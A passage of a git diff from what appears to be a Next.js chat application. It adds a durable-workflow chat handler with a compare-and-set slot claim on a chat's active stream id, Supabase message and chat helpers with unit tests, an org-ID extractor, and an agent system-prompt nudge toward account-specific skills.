Do not include line numbers or ranges.", + "- Do not use this format for URLs or anything that is not a real workspace file path.", + "- If you are not sure of the exact file path, do not invent one.", +].join("\n"); diff --git a/lib/chat/compareAndSetChatActiveStreamId.ts b/lib/chat/compareAndSetChatActiveStreamId.ts new file mode 100644 index 000000000..b3b218245 --- /dev/null +++ b/lib/chat/compareAndSetChatActiveStreamId.ts @@ -0,0 +1,49 @@ +import { updateChat } from "@/lib/supabase/chats/updateChat"; + +/** + * Result of the CAS attempt. Forces callers to distinguish: + * + * - `{ ok: true, claimed: true }` — the row matched the expected value and + * was updated to `next`. + * - `{ ok: true, claimed: false }` — predicate didn't match (a race was + * lost OR the row's `active_stream_id` is in some other state). + * - `{ ok: false, error }` — Supabase / network failure. Distinct from + * "race lost" so callers don't return a misleading 409 when the DB is + * actually unhealthy. + */ +export type CasChatActiveStreamIdResult = + | { ok: true; claimed: boolean } + | { ok: false; error: string }; + +/** + * Atomically swap `chats.active_stream_id` from `expected` to `next` for + * the given chat. Domain wrapper over the generic `updateChat` helper — + * keeps the CAS-on-active_stream_id concept here (in the chat domain) + * rather than in the Supabase plumbing. + * + * Used by `/api/chat/workflow` to: + * - Claim the slot before `start(workflow)` (`expected: null`, `next: "pending-"`). + * - Promote the placeholder to the real run id after start. + * - Release a stale slot in `reconcileExistingActiveStream`. + * + * @param chatId - Target chat id. + * @param expected - The value `active_stream_id` must currently hold (null to + * require an unset slot). + * @param next - The value to write (null to release the slot). 
+ */ +export async function compareAndSetChatActiveStreamId( + chatId: string, + expected: string | null, + next: string | null, +): Promise { + const result = await updateChat( + { id: chatId, where: { active_stream_id: expected } }, + { active_stream_id: next }, + ); + + if ("error" in result) { + return { ok: false, error: result.error }; + } + + return { ok: true, claimed: result.rowsUpdated > 0 }; +} diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts index 137f699cb..dcaad8585 100644 --- a/lib/chat/handleChatWorkflowStream.ts +++ b/lib/chat/handleChatWorkflowStream.ts @@ -1,31 +1,56 @@ import { NextRequest, NextResponse } from "next/server"; -import { createUIMessageStream, createUIMessageStreamResponse } from "ai"; +import { createUIMessageStreamResponse, type UIMessageChunk } from "ai"; +import { start, getRun } from "workflow/api"; import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow"; +import { maybeResumeChatStream } from "@/lib/chat/maybeResumeChatStream"; import { selectSessions } from "@/lib/supabase/sessions/selectSessions"; import { selectChats } from "@/lib/supabase/chats/selectChats"; +import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId"; import { isSandboxActive } from "@/lib/sandbox/isSandboxActive"; +import { buildActiveLifecycleUpdate } from "@/lib/sandbox/buildActiveLifecycleUpdate"; +import { updateSession } from "@/lib/supabase/sessions/updateSession"; +import { persistLatestUserMessage } from "@/lib/chat/persistLatestUserMessage"; import { errorResponse } from "@/lib/networking/errorResponse"; import { getCorsHeaders } from "@/lib/networking/getCorsHeaders"; +import { runAgentWorkflow } from "@/app/lib/workflows/runAgentWorkflow"; import generateUUID from "@/lib/uuid/generateUUID"; +const DEFAULT_MODEL_ID = "anthropic/claude-haiku-4.5"; + /** * Handles POST /api/chat/workflow. 
* - Stub implementation: delegates auth + body validation to validateChatWorkflow, - * verifies ownership of the referenced session + chat, confirms the session's - * sandbox is active, then returns a hardcoded UIMessage stream with an - * `x-workflow-run-id` header. The Vercel Workflow that will eventually drive - * the agent loop is wired up in a follow-up PR — this stub exists so clients - * can integrate against the contract documented at - * /api-reference/chat/workflow. + * Wires the chat UI to a durable Vercel Workflow agent loop. Flow: + * + * 1. Validate auth + body (validateChatWorkflow). + * 2. Verify session + chat ownership; ensure the session has an active sandbox. + * 3. If a workflow is already running for this chat, resume / 409 via + * maybeResumeChatStream (extracted for OCP). + * 4. **Claim `chats.active_stream_id` BEFORE starting the workflow** using + * a `pending-` placeholder CAS. Closes the race window where two + * concurrent requests could both call `start()` and bill the model + * before one loses the CAS. + * 5. Refresh the session's lifecycle-activity timestamp + fire-and-forget + * persist the latest user message. + * 6. start(runAgentWorkflow), then promote the placeholder to the real run id + * via CAS; if the promotion fails, cancel the new run and return 409. + * 7. Return the workflow's UIMessage stream with x-workflow-run-id header. + * + * If we lost the placeholder CAS in step 4, the slot is already held by + * another in-flight or pending request → 409 (no workflow was started, so + * nothing to cancel). * - * @param request - The incoming NextRequest - * @returns A streaming Response (200) or a NextResponse error. + * Tools/sandbox passing is intentionally not wired here yet — the follow-up + * PR ports the @open-harness/agent tool surface into api. + * + * @param request - The incoming NextRequest. + * @returns A streaming 200 Response or a NextResponse error. 
*/ export async function handleChatWorkflowStream(request: NextRequest): Promise { const validated = await validateChatWorkflow(request); if (validated instanceof NextResponse) return validated; + // Session + ownership + sandbox active const sessions = await selectSessions({ id: validated.sessionId }); if (sessions === null) return errorResponse("Internal server error", 500); const session = sessions[0]; @@ -33,29 +58,56 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise { - const id = generateUUID(); - writer.write({ type: "text-start", id }); - writer.write({ type: "text-delta", id, delta: "Hello from /api/chat/workflow" }); - writer.write({ type: "text-end", id }); + // We own the slot — safe to start the workflow. + await updateSession(validated.sessionId, buildActiveLifecycleUpdate(session.sandbox_state)); + void persistLatestUserMessage(validated.chatId, validated.messages as never); + + const modelId = chat.model_id ?? DEFAULT_MODEL_ID; + const run = await start(runAgentWorkflow, [ + { + messages: validated.messages, + chatId: validated.chatId, + sessionId: validated.sessionId, + modelId, }, - }); + ]); + + // Promote placeholder → real run id via CAS. If something asynchronously + // stole the slot (or the DB went down) we cancel the workflow we just + // started since another stream now owns the client. 
+ const promoted = await compareAndSetChatActiveStreamId(validated.chatId, placeholder, run.runId); + if (!promoted.ok || !promoted.claimed) { + try { + await getRun(run.runId).cancel(); + } catch (error) { + console.error("[handleChatWorkflowStream] cancel after slot-loss failed:", error); + } + return errorResponse("Another workflow is already running for this chat", 409); + } return createUIMessageStreamResponse({ - stream, - headers: { - ...getCorsHeaders(), - "x-workflow-run-id": runId, - }, + stream: run.getReadable(), + headers: { ...getCorsHeaders(), "x-workflow-run-id": run.runId }, }); } diff --git a/lib/chat/maybeResumeChatStream.ts b/lib/chat/maybeResumeChatStream.ts new file mode 100644 index 000000000..209113fbf --- /dev/null +++ b/lib/chat/maybeResumeChatStream.ts @@ -0,0 +1,40 @@ +import { createUIMessageStreamResponse, type UIMessageChunk } from "ai"; +import { reconcileExistingActiveStream } from "@/lib/chat/reconcileExistingActiveStream"; +import { errorResponse } from "@/lib/networking/errorResponse"; +import { getCorsHeaders } from "@/lib/networking/getCorsHeaders"; + +/** + * Encapsulates the "is there already a workflow for this chat?" branch of + * the POST /api/chat/workflow handler. + * + * - If `activeStreamId` is unset → returns `null`; handler proceeds with + * a fresh workflow. + * - If a workflow is alive → returns a streaming `Response` that pipes + * the existing run's readable back to the client. + * - If the slot is held by a dead/transient/raced run → returns a 409 + * `Response`. + * + * Extracted from the handler so the orchestration stays small and the + * resume-vs-conflict logic can grow independently. 
+ */ +export async function maybeResumeChatStream( + chatId: string, + activeStreamId: string | null, +): Promise { + if (!activeStreamId) return null; + + const reconciled = await reconcileExistingActiveStream(chatId, activeStreamId); + + if (reconciled.action === "resume") { + return createUIMessageStreamResponse({ + stream: reconciled.stream as ReadableStream, + headers: { ...getCorsHeaders(), "x-workflow-run-id": reconciled.runId }, + }); + } + + if (reconciled.action === "conflict") { + return errorResponse("Another workflow is already running for this chat", 409); + } + + return null; // action: "ready" — caller starts a new workflow. +} diff --git a/lib/chat/persistLatestUserMessage.ts b/lib/chat/persistLatestUserMessage.ts new file mode 100644 index 000000000..73c06f5ef --- /dev/null +++ b/lib/chat/persistLatestUserMessage.ts @@ -0,0 +1,84 @@ +import { upsertChatMessage } from "@/lib/supabase/chat_messages/upsertChatMessage"; +import { selectChatMessages } from "@/lib/supabase/chat_messages/selectChatMessages"; +import { updateChat } from "@/lib/supabase/chats/updateChat"; + +type TextPart = { type: "text"; text: string }; +type UserMessage = { id: string; role: string; parts: Array }; + +const TITLE_MAX_LENGTH = 80; +const TRUNCATION_SUFFIX = "…"; +const TITLE_BODY_BUDGET = TITLE_MAX_LENGTH - TRUNCATION_SUFFIX.length; + +/** + * Fire-and-forget persistence of the latest user message in a chat-workflow + * request. Called before `start(runAgentWorkflow, ...)` so that: + * + * - A page refresh during workflow queue time still shows the user message. + * - The chat's `updated_at` reflects activity even if the workflow hasn't + * produced its first chunk yet. + * - The chat title is set from the first user message (capped at 80 chars + * including the truncation suffix, addressing the prior off-by-3 bug). + * + * Title-eligibility uses "earliest message in the chat", not "only message", + * so a fast-following second message can't race past the title-set. 
+ * + * All failures are caught and logged — this MUST NOT block the request path. + * + * @param chatId - The target chat. + * @param messages - The full message list from the request body. + */ +export async function persistLatestUserMessage( + chatId: string, + messages: UserMessage[], +): Promise { + try { + const latest = messages[messages.length - 1]; + if (!latest || latest.role !== "user") return; + + const inserted = await upsertChatMessage({ + id: latest.id, + chat_id: chatId, + role: "user", + parts: latest as never, + }); + + // Bail on DB errors (already logged). Don't touch the chat or set a title + // since we can't confirm the message landed. + if (!inserted.ok) return; + + // If it was a duplicate, the original insert already drove side effects. + if (inserted.isDuplicate || inserted.row === null) return; + + await updateChat({ id: chatId }, { updated_at: new Date().toISOString() }); + + // Title-set is gated on "is this row still the earliest message in the chat?" + // — a fast follow-up message that landed before this query wouldn't shift + // the earliest row's id, so we'd still title from this message correctly, + // and racing in the opposite direction (this message landed second) gives + // us a different id at position 0 and we correctly skip. + const earliest = await selectChatMessages({ + chatId, + orderBy: { createdAt: "asc" }, + limit: 1, + }); + + // DB-error or no rows — bail without titling. + if (!earliest || earliest.length === 0) return; + if (earliest[0]?.id !== inserted.row.id) return; + + const text = latest.parts + .filter((part): part is TextPart => part.type === "text") + .map(part => part.text) + .join(" ") + .trim(); + if (text.length === 0) return; + + const title = + text.length > TITLE_MAX_LENGTH + ? 
`${text.slice(0, TITLE_BODY_BUDGET)}${TRUNCATION_SUFFIX}` + : text; + await updateChat({ id: chatId }, { title }); + } catch (error) { + console.error("[persistLatestUserMessage] error:", error); + } +} diff --git a/lib/chat/reconcileExistingActiveStream.ts b/lib/chat/reconcileExistingActiveStream.ts new file mode 100644 index 000000000..4ab004493 --- /dev/null +++ b/lib/chat/reconcileExistingActiveStream.ts @@ -0,0 +1,56 @@ +import { getRun } from "workflow/api"; +import { compareAndSetChatActiveStreamId } from "@/lib/chat/compareAndSetChatActiveStreamId"; + +export type ReconcileResult = + | { action: "resume"; runId: string; stream: ReadableStream } + | { action: "ready" } + | { action: "conflict" }; + +const RUNNING_STATUSES = new Set(["running", "pending"]); + +/** + * Resolves what to do when `chats.active_stream_id` is already set at the + * start of a new chat-workflow request. + * + * - If the referenced workflow run is alive (`running` | `pending`) → + * `action: "resume"` with the existing readable. Caller pipes it back to + * the client. + * - If the run is terminally done AND we win the CAS to clear the stale id + * → `action: "ready"`. Caller starts a fresh workflow. + * - **Anything else** (workflow API throws, CAS-clear loses the race, CAS + * reports a DB error) → `action: "conflict"`. Surfaces as 409 upstream. + * + * Safer-than-open-agents error semantics: a transient `workflow/api` failure + * does NOT clear the stale stream id (which previously created a window for + * duplicate runs). When we can't confidently say "this stream is dead", we + * refuse to start a new one. Eventually the real run completes, a subsequent + * request observes that, clears the slot, and unblocks. + */ +export async function reconcileExistingActiveStream( + chatId: string, + activeStreamId: string, +): Promise { + // Probe the workflow status. Any thrown error here is treated as transient — + // we keep the slot held rather than risk starting a duplicate run. 
+ let status: string; + try { + const existingRun = getRun(activeStreamId); + status = await existingRun.status; + if (RUNNING_STATUSES.has(status)) { + return { action: "resume", runId: activeStreamId, stream: existingRun.getReadable() }; + } + } catch (error) { + console.error("[reconcileExistingActiveStream] getRun failed; treating as conflict:", error); + return { action: "conflict" }; + } + + // Run is terminally done. Attempt to clear the stale id via CAS. If we + // win → ready. Anything else (race lost OR DB error) → conflict, so we + // never accidentally start a duplicate workflow on the back of a failed + // read. + const cleared = await compareAndSetChatActiveStreamId(chatId, activeStreamId, null); + if (cleared.ok && cleared.claimed) { + return { action: "ready" }; + } + return { action: "conflict" }; +} diff --git a/lib/chat/recoupApiSkillPrompt.ts b/lib/chat/recoupApiSkillPrompt.ts new file mode 100644 index 000000000..93f4d2e39 --- /dev/null +++ b/lib/chat/recoupApiSkillPrompt.ts @@ -0,0 +1,11 @@ +/** + * Always-on nudge appended to the agent's system instructions. Points + * at the `recoup-api` and `artist-workspace` skills so prompts about + * anything owned by the user's Recoup account reliably load the right + * playbook — either the filesystem (for sandbox inventory and create- + * artist scaffolding) or the API (for live data) — instead of the + * agent guessing endpoint paths or interpreting overloaded nouns like + * "tasks" as generic repo TODOs. + */ +export const recoupApiSkillPrompt = + 'If you\'re asked about anything belonging to their Recoup account — artists, socials, orgs, research, tasks, chats, pulses, notifications, subscriptions, or any other resource visible at recoup-api.vercel.app / developers.recoupable.com — pick the right skill first instead of guessing. 
For inventory questions about this sandbox ("what artists / orgs do I have", "list my artists", "what\'s in here") load `artist-workspace` — the `artists/{artist-slug}/RECOUP.md` tree is authoritative for this sandbox (the sandbox is already org-scoped — its repo IS the org — so artists live at the top level, not under an `orgs/` directory) and the API is not. For create-artist intents ("create artist", "onboard X", "add an artist", "set up a new artist") also load `artist-workspace` first — it scaffolds the artist\'s `RECOUP.md` as a checklist file you tick off step-by-step, which is what keeps the 8-step chain from dropping steps when run from a sandbox; the curl-by-curl reference for each step lives via `recoup-api` (developers.recoupable.com/workflows/create-artist), but the checklist file is the source of truth for what\'s done. For live data (socials, posts, metrics, research, tasks, notifications) or anything not in the tree, load `recoup-api` — and when `RECOUP_ORG_ID` is set in the env, scope list endpoints to that org (`/api/organizations/$RECOUP_ORG_ID/...`, `--org $RECOUP_ORG_ID` on the CLI) so you get results for the sandbox\'s org, not every org the user belongs to. 
Treat ambiguous account-data questions as Recoup questions by default, not repo-level TODOs.'; diff --git a/lib/recoupable/__tests__/extractOrgId.test.ts b/lib/recoupable/__tests__/extractOrgId.test.ts new file mode 100644 index 000000000..c38232c4c --- /dev/null +++ b/lib/recoupable/__tests__/extractOrgId.test.ts @@ -0,0 +1,57 @@ +import { describe, it, expect } from "vitest"; +import { extractOrgId } from "@/lib/recoupable/extractOrgId"; + +describe("extractOrgId", () => { + it("extracts the UUID tail from a full clone URL", () => { + expect( + extractOrgId( + "https://github.com/recoupable/org-rostrum-pacific-cebcc866-34c3-451c-8cd7-f63309acff0a", + ), + ).toBe("cebcc866-34c3-451c-8cd7-f63309acff0a"); + }); + + it("strips a .git suffix before extracting", () => { + expect( + extractOrgId( + "https://github.com/recoupable/org-myco-wtf-80263819-9dfd-4bbf-9371-60a6185122d6.git", + ), + ).toBe("80263819-9dfd-4bbf-9371-60a6185122d6"); + }); + + it("tolerates a trailing slash on the URL", () => { + expect( + extractOrgId( + "https://github.com/recoupable/org-myco-wtf-80263819-9dfd-4bbf-9371-60a6185122d6/", + ), + ).toBe("80263819-9dfd-4bbf-9371-60a6185122d6"); + }); + + it("accepts an already-extracted repo name", () => { + expect(extractOrgId("org-rostrum-pacific-cebcc866-34c3-451c-8cd7-f63309acff0a")).toBe( + "cebcc866-34c3-451c-8cd7-f63309acff0a", + ); + }); + + it("lowercases an uppercase UUID", () => { + expect(extractOrgId("org-myco-wtf-80263819-9DFD-4BBF-9371-60A6185122D6")).toBe( + "80263819-9dfd-4bbf-9371-60a6185122d6", + ); + }); + + it("returns null for non-Recoupable clone URLs", () => { + expect( + extractOrgId( + "https://github.com/someone-else/org-myco-wtf-80263819-9dfd-4bbf-9371-60a6185122d6", + ), + ).toBeNull(); + }); + + it("returns null when the repo name has no UUID tail", () => { + expect(extractOrgId("org-rostrum-pacific")).toBeNull(); + }); + + it("returns null for malformed strings", () => { + expect(extractOrgId("")).toBeNull(); + 
expect(extractOrgId("not-a-url-or-repo")).toBeNull(); + }); +}); diff --git a/lib/recoupable/extractOrgId.ts b/lib/recoupable/extractOrgId.ts new file mode 100644 index 000000000..ac30985c5 --- /dev/null +++ b/lib/recoupable/extractOrgId.ts @@ -0,0 +1,31 @@ +import { extractOrgRepoName } from "@/lib/recoupable/extractOrgRepoName"; + +const UUID_TAIL_PATTERN = /-([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})$/i; + +/** + * Extracts the organization UUID from a Recoupable org clone URL or + * repo name. Recoupable orgs follow the convention `org-<slug>-<uuid>` + * in their GitHub repo names, so the UUID is always the trailing 36 chars. + * + * Used by the chat workflow handler to derive `recoupOrgId` from the + * session's clone URL — the `recoup-api` skill scopes calls to this org + * so sandbox agents see results for the sandbox's org rather than every + * org the user belongs to. + * + * @param cloneUrlOrRepoName - Either the full clone URL + * (`https://github.com/recoupable/org-foo-<uuid>`) or the already-extracted + * repo name (`org-foo-<uuid>`). + * @returns The lowercased UUID, or `null` for anything that doesn't match. + */ +export function extractOrgId(cloneUrlOrRepoName: string): string | null { + const repoName = cloneUrlOrRepoName.startsWith("http") + ? extractOrgRepoName(cloneUrlOrRepoName) + : cloneUrlOrRepoName; + + if (!repoName) { + return null; + } + + const match = repoName.match(UUID_TAIL_PATTERN); + return match?.[1]?.toLowerCase() ?? 
null; +} diff --git a/lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts b/lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts new file mode 100644 index 000000000..c973f24df --- /dev/null +++ b/lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts @@ -0,0 +1,58 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { selectChatMessages } from "@/lib/supabase/chat_messages/selectChatMessages"; + +const selectChain = vi.fn(); +const eqChain = vi.fn(); +const orderChain = vi.fn(); +const limitChain = vi.fn(); + +vi.mock("@/lib/supabase/serverClient", () => ({ + default: { + from: vi.fn(() => ({ select: selectChain })), + }, +})); + +beforeEach(() => { + vi.clearAllMocks(); + // Allow any number of chained .eq() / .order() / .limit() calls — they all + // return the same fluent builder. + const builder = { eq: eqChain, order: orderChain, limit: limitChain }; + selectChain.mockReturnValue(builder); + eqChain.mockReturnValue(builder); + orderChain.mockReturnValue(builder); + limitChain.mockReturnValue(builder); +}); + +describe("selectChatMessages", () => { + it("returns rows on success", async () => { + limitChain.mockResolvedValue({ data: [{ id: "m-1" }], error: null }); + const result = await selectChatMessages({ + chatId: "c-1", + orderBy: { createdAt: "asc" }, + limit: 1, + }); + expect(result).toEqual([{ id: "m-1" }]); + expect(eqChain).toHaveBeenCalledWith("chat_id", "c-1"); + expect(orderChain).toHaveBeenCalledWith("created_at", { ascending: true }); + expect(limitChain).toHaveBeenCalledWith(1); + }); + + it("returns null on Supabase error (so callers can distinguish from empty)", async () => { + // With no filters, the terminal call is on selectChain itself + selectChain.mockResolvedValue({ data: null, error: { message: "down" } }); + const result = await selectChatMessages({}); + expect(result).toBeNull(); + }); + + it("returns [] on no match", async () => { + limitChain.mockResolvedValue({ data: [], 
error: null }); + const result = await selectChatMessages({ chatId: "c-1", limit: 1 }); + expect(result).toEqual([]); + }); + + it("applies desc ordering when requested", async () => { + limitChain.mockResolvedValue({ data: [], error: null }); + await selectChatMessages({ chatId: "c-1", orderBy: { createdAt: "desc" }, limit: 1 }); + expect(orderChain).toHaveBeenCalledWith("created_at", { ascending: false }); + }); +}); diff --git a/lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts b/lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts new file mode 100644 index 000000000..0ea559058 --- /dev/null +++ b/lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts @@ -0,0 +1,46 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { upsertChatMessage } from "@/lib/supabase/chat_messages/upsertChatMessage"; + +const upsertChain = vi.fn(); +const selectChain = vi.fn(); +const maybeSingleChain = vi.fn(); + +vi.mock("@/lib/supabase/serverClient", () => ({ + default: { + from: vi.fn(() => ({ upsert: upsertChain })), + }, +})); + +beforeEach(() => { + vi.clearAllMocks(); + upsertChain.mockReturnValue({ select: selectChain }); + selectChain.mockReturnValue({ maybeSingle: maybeSingleChain }); +}); + +const data = { + id: "msg-1", + chat_id: "chat-1", + role: "user" as const, + parts: [{ type: "text", text: "hi" }], +}; + +describe("upsertChatMessage", () => { + it("returns ok:true with the row and isDuplicate:false on new insert", async () => { + maybeSingleChain.mockResolvedValue({ data, error: null }); + const result = await upsertChatMessage(data); + expect(result).toEqual({ ok: true, row: data, isDuplicate: false }); + expect(upsertChain).toHaveBeenCalledWith(data, { onConflict: "id", ignoreDuplicates: true }); + }); + + it("returns ok:true with isDuplicate:true when the id already existed", async () => { + maybeSingleChain.mockResolvedValue({ data: null, error: null }); + const result = await upsertChatMessage(data); + 
expect(result).toEqual({ ok: true, row: null, isDuplicate: true }); + }); + + it("returns ok:false with error on Supabase failure (distinct from duplicate)", async () => { + maybeSingleChain.mockResolvedValue({ data: null, error: { message: "down" } }); + const result = await upsertChatMessage(data); + expect(result).toEqual({ ok: false, error: "down" }); + }); +}); diff --git a/lib/supabase/chat_messages/selectChatMessages.ts b/lib/supabase/chat_messages/selectChatMessages.ts new file mode 100644 index 000000000..ff2ceae24 --- /dev/null +++ b/lib/supabase/chat_messages/selectChatMessages.ts @@ -0,0 +1,40 @@ +import supabase from "@/lib/supabase/serverClient"; +import type { Tables } from "@/types/database.types"; + +export type SelectChatMessagesFilter = { + id?: string; + chatId?: string; + /** Order by `created_at` in this direction, ties broken by `id` ascending. Omit for no explicit ordering. */ + orderBy?: { createdAt: "asc" | "desc" }; + /** Maximum rows to return. Omit for no limit. */ + limit?: number; +}; + +/** + * Generic `chat_messages` reader mirroring the `selectChats` / `selectSessions` + * pattern. Returns rows on success, `[]` on no match, or `null` on Supabase + * error so callers can distinguish "nothing here" from "DB unreachable". + * + * Domain-specific questions ("is this the first message in the chat?") live + * in wrapper helpers under `lib/chat/` — keep this file focused on the + * read primitive. 
+ */ +export async function selectChatMessages( + filter: SelectChatMessagesFilter = {}, +): Promise[] | null> { + let query = supabase.from("chat_messages").select("*"); + if (filter.id) query = query.eq("id", filter.id); + if (filter.chatId) query = query.eq("chat_id", filter.chatId); + if (filter.orderBy) { + query = query.order("created_at", { ascending: filter.orderBy.createdAt === "asc" }); + query = query.order("id", { ascending: true }); + } + if (filter.limit !== undefined) query = query.limit(filter.limit); + + const { data, error } = await query; + if (error) { + console.error("[selectChatMessages] error:", error); + return null; + } + return data ?? []; +} diff --git a/lib/supabase/chat_messages/upsertChatMessage.ts b/lib/supabase/chat_messages/upsertChatMessage.ts new file mode 100644 index 000000000..d98b9b343 --- /dev/null +++ b/lib/supabase/chat_messages/upsertChatMessage.ts @@ -0,0 +1,37 @@ +import supabase from "@/lib/supabase/serverClient"; +import type { Tables, TablesInsert } from "@/types/database.types"; + +/** + * Discriminated result so callers can distinguish: + * - `{ ok: true, row, isDuplicate }` — known outcome; row is null when the + * existing `id` conflict was silently ignored. + * - `{ ok: false, error }` — Supabase failure. Visible to logs so transient + * DB problems aren't masked as duplicates. + */ +export type UpsertChatMessageResult = + | { ok: true; row: Tables<"chat_messages"> | null; isDuplicate: boolean } + | { ok: false; error: string }; + +/** + * Insert-or-skip a single chat message row. Wraps Supabase upsert with + * `ignoreDuplicates: true` on the `id` primary key, but returns a + * discriminated result so callers can tell "duplicate skipped" apart from + * "DB error" — the previous helper returned `null` for both, which made + * callers silently swallow operational failures. 
+ */ +export async function upsertChatMessage( + data: TablesInsert<"chat_messages">, +): Promise { + const { data: row, error } = await supabase + .from("chat_messages") + .upsert(data, { onConflict: "id", ignoreDuplicates: true }) + .select() + .maybeSingle(); + + if (error) { + console.error("[upsertChatMessage] error:", error); + return { ok: false, error: error.message }; + } + + return { ok: true, row, isDuplicate: row === null }; +} diff --git a/lib/supabase/chats/__tests__/updateChat.test.ts b/lib/supabase/chats/__tests__/updateChat.test.ts new file mode 100644 index 000000000..a0edc247b --- /dev/null +++ b/lib/supabase/chats/__tests__/updateChat.test.ts @@ -0,0 +1,110 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { updateChat } from "@/lib/supabase/chats/updateChat"; + +const updateChain = vi.fn(); +const eqChain = vi.fn(); +const matchChain = vi.fn(); +const isChain = vi.fn(); +const selectChain = vi.fn(); + +vi.mock("@/lib/supabase/serverClient", () => ({ + default: { + from: vi.fn(() => ({ update: updateChain })), + }, +})); + +beforeEach(() => { + vi.clearAllMocks(); + // Fluent builder mock — every method returns the same builder so we can + // chain .eq / .match / .is / .select in any order without per-step setup. 
+ const builder = { eq: eqChain, match: matchChain, is: isChain, select: selectChain }; + updateChain.mockReturnValue(builder); + eqChain.mockReturnValue(builder); + matchChain.mockReturnValue(builder); + isChain.mockReturnValue(builder); +}); + +describe("updateChat", () => { + describe("plain update (no where predicate)", () => { + it("returns ok:true with rowsUpdated and the row on success", async () => { + const row = { id: "chat-1", title: "renamed" }; + selectChain.mockResolvedValue({ data: [row], error: null }); + const result = await updateChat({ id: "chat-1" }, { title: "renamed" }); + expect(result.ok).toBe(true); + if (!result.ok) return; + expect(result.rowsUpdated).toBe(1); + expect(result.row).toEqual(row); + expect(updateChain).toHaveBeenCalledWith({ title: "renamed" }); + expect(eqChain).toHaveBeenCalledWith("id", "chat-1"); + // With no where filter, match is called with an empty object. + expect(matchChain).toHaveBeenCalledWith({}); + }); + + it("returns ok:false with error on Supabase failure", async () => { + selectChain.mockResolvedValue({ data: null, error: { message: "down" } }); + const result = await updateChat({ id: "chat-x" }, { title: "x" }); + expect(result.ok).toBe(false); + if (result.ok) return; + expect(result.error).toBe("down"); + }); + }); + + describe("generic where predicate", () => { + it("emits `is null` for null values (e.g. CAS expecting unset)", async () => { + selectChain.mockResolvedValue({ data: [{ id: "c-1" }], error: null }); + await updateChat( + { id: "c-1", where: { active_stream_id: null } }, + { active_stream_id: "wrun_x" }, + ); + expect(isChain).toHaveBeenCalledWith("active_stream_id", null); + // No non-null fields → match called with empty {} + expect(matchChain).toHaveBeenCalledWith({}); + }); + + it("emits `match()` for non-null values (e.g. 
CAS expecting a specific run id)", async () => { + selectChain.mockResolvedValue({ data: [{ id: "c-1" }], error: null }); + await updateChat( + { id: "c-1", where: { active_stream_id: "wrun_old" } }, + { active_stream_id: "wrun_new" }, + ); + expect(matchChain).toHaveBeenCalledWith({ active_stream_id: "wrun_old" }); + // No null fields → is() not called + expect(isChain).not.toHaveBeenCalled(); + }); + + it("AND-s nullable + equality where columns together", async () => { + selectChain.mockResolvedValue({ data: [{ id: "c-1" }], error: null }); + await updateChat( + { id: "c-1", where: { active_stream_id: null, model_id: "anthropic/claude-haiku-4.5" } }, + { title: "x" }, + ); + expect(isChain).toHaveBeenCalledWith("active_stream_id", null); + expect(matchChain).toHaveBeenCalledWith({ model_id: "anthropic/claude-haiku-4.5" }); + }); + + it("returns ok:true rowsUpdated:0 when the predicate matches no row (race lost)", async () => { + selectChain.mockResolvedValue({ data: [], error: null }); + const result = await updateChat( + { id: "c-1", where: { active_stream_id: null } }, + { active_stream_id: "wrun_x" }, + ); + expect(result).toEqual(expect.objectContaining({ ok: true, rowsUpdated: 0 })); + }); + + it("differentiates 'race lost' (ok:true,rows:0) from 'DB error' (ok:false)", async () => { + selectChain.mockResolvedValueOnce({ data: [], error: null }); + const raceLost = await updateChat( + { id: "c-1", where: { active_stream_id: null } }, + { active_stream_id: "wrun_x" }, + ); + expect(raceLost).toEqual(expect.objectContaining({ ok: true, rowsUpdated: 0 })); + + selectChain.mockResolvedValueOnce({ data: null, error: { message: "down" } }); + const dbError = await updateChat( + { id: "c-1", where: { active_stream_id: null } }, + { active_stream_id: "wrun_x" }, + ); + expect(dbError).toEqual(expect.objectContaining({ ok: false, error: "down" })); + }); + }); +}); diff --git a/lib/supabase/chats/updateChat.ts b/lib/supabase/chats/updateChat.ts new file mode 100644 
index 000000000..63cd2064b --- /dev/null +++ b/lib/supabase/chats/updateChat.ts @@ -0,0 +1,86 @@ +import supabase from "@/lib/supabase/serverClient"; +import type { Tables, TablesUpdate } from "@/types/database.types"; + +/** + * Subset of `chats` columns that callers are permitted to mutate via this + * helper. Explicitly excludes structural fields (`id`, `session_id`, + * `created_at`) so generic updates cannot bypass chat invariants. + */ +export type ChatMutableFields = Pick< + TablesUpdate<"chats">, + "title" | "model_id" | "updated_at" | "active_stream_id" | "last_assistant_message_at" +>; + +/** + * Filter accepted by {@link updateChat}. Always matches by `id`. Optional + * `where` adds AND-ed predicates per column — generic across columns so + * domain-specific concerns (e.g. CAS on `active_stream_id`) stay in their + * own wrapper helpers rather than baking into the Supabase plumbing. + * + * Each `where` entry maps to `column = value` (or `column IS NULL` when + * `value === null`). + */ +export type UpdateChatFilter = { + id: string; + where?: Partial>; +}; + +/** + * Discriminated result so callers can distinguish: + * - `{ ok: true, rowsUpdated: 1 }` — updated as intended. + * - `{ ok: true, rowsUpdated: 0 }` — the predicate matched zero rows (a CAS + * race lost, or `id` not found). + * - `{ ok: false, error }` — Supabase / network failure. + */ +export type UpdateChatResult = + | { ok: true; rowsUpdated: number; row: Tables<"chats"> | null } + | { ok: false; error: string }; + +/** + * Updates a `chats` row by id, optionally constrained by a generic `where` + * predicate. Returns a discriminated result so callers can tell + * "predicate didn't match" (a race lost) from "Supabase failure" (operational + * issue) — the previous behavior of returning `false` for both was a CAS bug. 
